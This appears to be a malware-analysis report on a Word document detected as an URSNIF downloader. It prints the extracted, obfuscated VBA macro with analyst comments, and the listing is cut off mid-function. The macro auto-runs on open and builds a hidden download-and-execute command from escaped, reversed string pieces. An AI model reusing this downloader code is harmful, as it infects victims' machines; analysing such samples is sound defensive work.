MALICIOUS
222
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The sample contains VBA macros, including a Document_Open macro that calls the Shell() function to execute a command. This is consistent with an attempt to download and run a secondary payload, and the ClamAV detection 'Doc.Downloader.URSNIF-6729855-3' corroborates the malicious behavior.
Heuristics 6
-
ClamAV: Doc.Downloader.URSNIF-6729855-3 — critical — CLAMAV_DETECTION: ClamAV detected this file as malware: Doc.Downloader.URSNIF-6729855-3
-
VBA macros detected — medium — 3 related findings — OLE_VBA_MACROS: Document contains VBA macro code
-
Shell() call in VBA — critical — OLE_VBA_SHELL: Shell() call in VBA
-
Document_Open macro — high — OLE_VBA_DOCOPEN: Document_Open macro
-
VBA p-code auto-exec with execution tokens — high — OLE_VBA_PCODE_AUTOEXEC_EXEC: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where the visible source is unavailable.
-
Embedded URL — info — EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL http://schemas.openxmlformats.org/drawingml/2006/main — In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 6749 bytes |

SHA-256: 7a9db0b3c2f2d6163800ab65cc469f25c12bd761303af9e4214ef45d633ec0ab
Preview script — first 1,000 lines of the extracted script
' Module header attributes as exported by the macro extractor. VB_Name is the
' module's name; the module is based on the Normal template's ThisDocument
' (VB_Base), which is where the Document_open handler below is hosted.
Attribute VB_Name = "wUqniJN"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Auto-execution entry point: the Document_Open event handler runs as soon as the
' document is opened with macros enabled (this is the OLE_VBA_DOCOPEN finding).
' Errors are silenced by a line-continued "On Error Resume Next", so a failing
' step does not surface to the user.
Private Sub Document_open()
On _
Error _
Resume _
Next
' Each VarType call evaluates a concatenation of string literals and discards the
' result; these statements have no effect on the command that is executed and
' appear to be filler around the real call.
VarType "2199" + "4777" + "6502" + "JduA"
VarType "YJQjhoTUaG" + "9273"
VarType "mShb" + "495619813" + "o" + "1217"
VarType "QAUYYZv" + "QT" + "QuYoQwzsms" + "3522"
VarType "26951348" + "27721404"
VarType "457642371" + "Zw" + "poutjpbQzdl" + "rBTj"
VarType "p" + "kVQWTk"
VarType "pwKWmshc" + "8038"
' The command line is assembled only at run time from the return values of the
' functions below, then run via Shell with the window style derived from vbHide
' (hidden window). No complete command appears as a literal in the source, which
' is why the OLE_VBA_SHELL heuristic keys on the Shell call itself.
' NOTE(review): SuZpUo is not defined within the visible part of the listing.
Shell sHUrUVruHj + UkiNZL + kuRhihOo + SuZpUo, Format(vbHide)
VarType "QLib" + "291068158"
VarType "PNrPClXjF" + "8016"
End Sub
' Start of a second extracted module; the helper functions that build the
' command fragments live here.
Attribute VB_Name = "JViqjNE"
' Returns the first fragment of the command string consumed by Document_open.
' The text is split into short literals joined with "+", some characters are
' produced from Chr() of an arithmetic sum, and the fragment is returned through
' the function name, so the assembled text never appears whole in the source.
' The many "^" characters in the literals are consistent with cmd.exe
' escape-character obfuscation (inferred from the strings, not confirmed here).
' Errors are suppressed by the line-continued "On Error Resume Next".
Function sHUrUVruHj()
On _
Error _
Resume _
Next
' VarType calls evaluate a concatenation and discard the result; filler.
VarType "O" + "8804" + "OFkuuOBUoFznw" + "DQNGWCk"
VarType "RJqw" + "5009"
VarType "l" + "jLLnqKmkqjJk"
VarType "w" + "125339705" + "TjtWlhL" + "ii"
VarType "433523758" + "423796162" + "fqBjtiC" + "bXHLlU"
' First piece: Chr() of summed constants replaces individual characters so a
' plain string scan does not see them.
EXtwYuwhGwU = Format(Chr(4 + 9 + 10 + 6 + 70)) + "m" + "d" + " " + "/V" + "^:ON/" + Format(Chr(2 + 6 + 7 + 4 + 48)) + Format(Chr(1 + 3 + 3 + 2 + 25)) + "s^e" + "^t" + " ^F" + "^w0" + "=^ " + "^ ^ "
VarType "1489" + "lnUrPQMpjvtLz"
VarType "6192" + "KF" + "5066" + "129354974"
VarType "P" + "DmBEMLm"
VarType "fImm" + "YQqLR"
hwXfBY = "^ ^" + " " + "^ ^ ^ " + "^ ^ " + "^}^}{^h" + Format(Chr(4 + 9 + 10 + 6 + 70)) + "ta" + Format(Chr(4 + 9 + 10 + 6 + 70)) + "^}" + ";^k" + "^aerb;^" + "F" + Format(Chr(4 + 9 + 10 + 6 + 70)) + "^Z$^" + " m^e^t" + "^"
VarType "biJTIwq" + "URthoI"
VarType "2443" + "s" + "OfiGSr" + "7687"
VarType "aXF" + "G" + "HcDdASSVJa" + "1125"
VarType "OwA" + "cSPsv" + "LdPvzGd" + "426513014"
pmLVpi = "I^" + "-^e^k^o" + "vnI^" + ";)^F" + Format(Chr(4 + 9 + 10 + 6 + 70)) + "^Z$^ ^," + "^tBK^$" + "(^el^i^" + "F^d" + "^a^o^ln" + "w^"
VarType "9566" + "441695958" + "328047719" + "pGA"
VarType "BBJG" + "GaIM"
QsMiH = "o^" + "D^.^" + "KR" + "N" + "${yr^t^"
VarType "iw" + "Nz" + "377309567" + "SIV"
VarType "136454831" + "477165620"
VarType "aQQ" + "283245583"
VarType "miSt" + "7408"
qKBXWWQdNJ = "{)lEh" + "^$ n^" + "i ^t^B" + "K^$(" + "h" + Format(Chr(4 + 9 + 10 + 6 + 70)) + "^aer" + "^o^f;" + "'"
' The five pieces are joined in order and returned as this function's value.
sHUrUVruHj = EXtwYuwhGwU + hwXfBY + pmLVpi + QsMiH + qKBXWWQdNJ
VarType "1258" + "ZvQtot"
VarType "1212" + "4461"
End Function
' Returns the second fragment of the command string consumed by Document_open,
' built the same way as sHUrUVruHj: short literals joined with "+", characters
' produced from Chr() of summed constants, result returned through the function
' name. Errors are suppressed by the line-continued "On Error Resume Next".
Function UkiNZL()
On _
Error _
Resume _
Next
' VarType calls evaluate a concatenation and discard the result; filler.
VarType "EGBJ" + "9483" + "iRVODFXo" + "166559592"
VarType "nqA" + "aUt"
VarType "hMJE" + "3729" + "CTRWfOiihmUfQ" + "7367"
GDEiThMB = "^exe.'+" + "^Uz" + "w^" + "$+" + "'^\" + "'^+" + Format(Chr(4 + 9 + 10 + 6 + 70)) + "i"
VarType "Pq" + "qUbwjbk"
VarType "6631" + "202324990" + "451683710" + "NFv"
oKiUd = "^l" + "^b^u^p:" + "vn" + "e$^=^" + "F" + Format(Chr(4 + 9 + 10 + 6 + 70))
VarType "vbLAMOkwDSZ" + "3273" + "pVOTEptf" + "cJ"
VarType "IVIHIH" + "A"
vrcVptR = "Z" + "^" + "$^;^'^3" + "^3^3' =" + " ^Uzw" + "^$^;" + ")^'^@" + "^'(" + "ti" + "l^pS^." + "^"
VarType "370046613" + "HOiJGVYd" + "k" + "nutBGKrQTRpSE"
VarType "5781" + "rvLXrnIX"
SDGdRjHzpD = "'^ORG" + "/se" + "^gam^" + "i/x" + "^u^" + "d^er^" + "-^d" + "emar" + "^f/s^em" + "eh^t/tn"
VarType "851" + "SisHfX" + "KuaRQPkZVr" + "1059"
VarType "jZ" + "DjPzMhONHBsJlu"
VarType "6074" + "vaQd" + "9940" + "29347307"
KSEfaAsw = "etn" + "^" + "o" + Format(Chr(4 + 9 + 10 + 6 + 70)) + "-" + "^pw" + "/m^o" + Format(Chr(4 + 9 + 10 + 6 + 70)) + ".re^" + "se" + "y" + "la//:^p" + "t" + "^t^h"
' The five pieces are joined in order and returned as this function's value.
UkiNZL = GDEiThMB + oKiUd + vrcVptR + SDGdRjHzpD + KSEfaAsw
VarType "1308" + "485983852"
VarType "JfiBOwt" + "2756" + "273624648" + "kTvUaOjFFCrjw"
End Function
Function kuRhihOo()
On _
Error _
Resume _
Next
VarType "CMqhjHAT" + "N" + "TmF" + "uzm"
VarType "UfpsajFQBoID" + "FQ"
VarType "QKGVwoW" + "1338" + "PlIW" + "8900"
knALszN = "^@" + "RY" + "^" + "WR^B/^m" + "^o" + Format(Chr(4 + 9
... (truncated)